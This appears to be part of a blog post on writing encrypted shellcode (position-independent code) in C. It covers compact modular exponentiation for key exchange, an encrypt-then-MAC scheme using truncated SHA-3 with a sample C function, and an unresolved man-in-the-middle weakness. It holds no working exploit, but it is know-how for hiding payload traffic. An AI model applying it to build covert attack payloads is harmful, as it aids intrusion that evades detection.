The public key cryptography we’re mostly familiar with today use big number libraries to perform computations necessary to protect information.

Most sane people will use a well established cryptography library to do all this but since our PIC can’t depend on any libraries we need to implement our own routines.

But it’s not all bad. In comparison to Elliptic Curve and Lattice based encryption, RSA or Diffie Hellman only uses modular arithmetic which requires large keys but requires the least amount of code. As demonstrated here, a modexp function for x86 can be implemented in 140 bytes!

There’s no Karatsuba or Montgomery multiplication used since our goal is to reduce code much as possible and that means keeping it simple.

See modexp.c for functions that perform Modular Exponentiation.

There’s a paper published in 2007 that discusses an encrypted payload similar to what I discuss here. An Encrypted Payload Protocol and Target-Side Scripting Engine by Dino Dai Zovi describes a payload using RC4 for symmetric encryption and ElGamal for key agreement however no source code for this was ever released.

Dino states the total size of Modular Exponentiation was approx. 1200 bytes which sounds about right if using bit shifting and addition instead of just addition. Remember: shifting left by 1 is the same as multiplying by 2 or simply adding value to itself. ๐Ÿ˜‰

Authenticated Encryption

It would appear using AEAD (Authenticated Encryption Associated Data) for packet encryption will become a standard eventually. TLS 1.3 will use only AEAD algorithms and I would expect other protocols to follow suit. Actually, 6 authenticated encryption modes (OCB 2.0, Key Wrap, CCM, EAX, Encrypt-then-MAC (EtM), and GCM) have been standardized in ISO/IEC 19772:2009 although it’s not clear what will be used in future.

The PIC uses an EtM (Encrypt Then MAC) scheme in order to reduce code but I have examined a few of the CAESAR submissions and think Ketje from some of the same authors behind Rijndael and Keccak looks good.

SHA-3 256-bit truncated to 96-bits provides integrity of encrypted packets. The hash is appended to end of 16-byte aligned ciphertext before being transmitted.

On the receiving end, we use the same key to generate MAC and compare with 96-bis we’ve received. If they match, we can presume it was sent by trusted party.

/**F*********************************************
 *
 * Generate MAC of SPP data
 *
 ************************************************/
VOID spp_mac(sc_tbl *x, DWORD inlen, PBYTE out)
{
  SHA3_CTX c;
  BYTE     m[SHA3_256];
  
  SHA3_Init(&c, SHA3_256);                       // initialize
  SHA3_Update(&c, x->v.tek.mkey, SPP_MKEY_LEN);  // add mac key
  SHA3_Update(&c, x->v.blk.buf, inlen);          // add data
  SHA3_Final(m, &c);                             // save
  
  memcpy(out, m, SPP_MAC_LEN);
}

Todo

The PIC client is susceptible to a MitM (Man In The Middle) attack because it does not verify if the public key sent by a server is from a trusted party. We can solve this by signing the public key or simply embedding one within the PIC before deployment avoiding the need to receive one at all.

Summary

Using C or C++ to write PICs that can run on multiple architectures makes more sense than writing each PIC in pure assembly. However, I would point out up to 50-60% of code can be reduced when PIC is written in pure assembly and so it’s not obsolete just yet!

I hope based on sources, more research will be done into using C for writing PICs and that it is more appealing than writing in pure assembly.

See sources here

Posted in assembly, cryptography, diffie hellman merkle, networking, programming, public key exchange, security, shellcode, windows | Tagged , , , , , , , | Leave a comment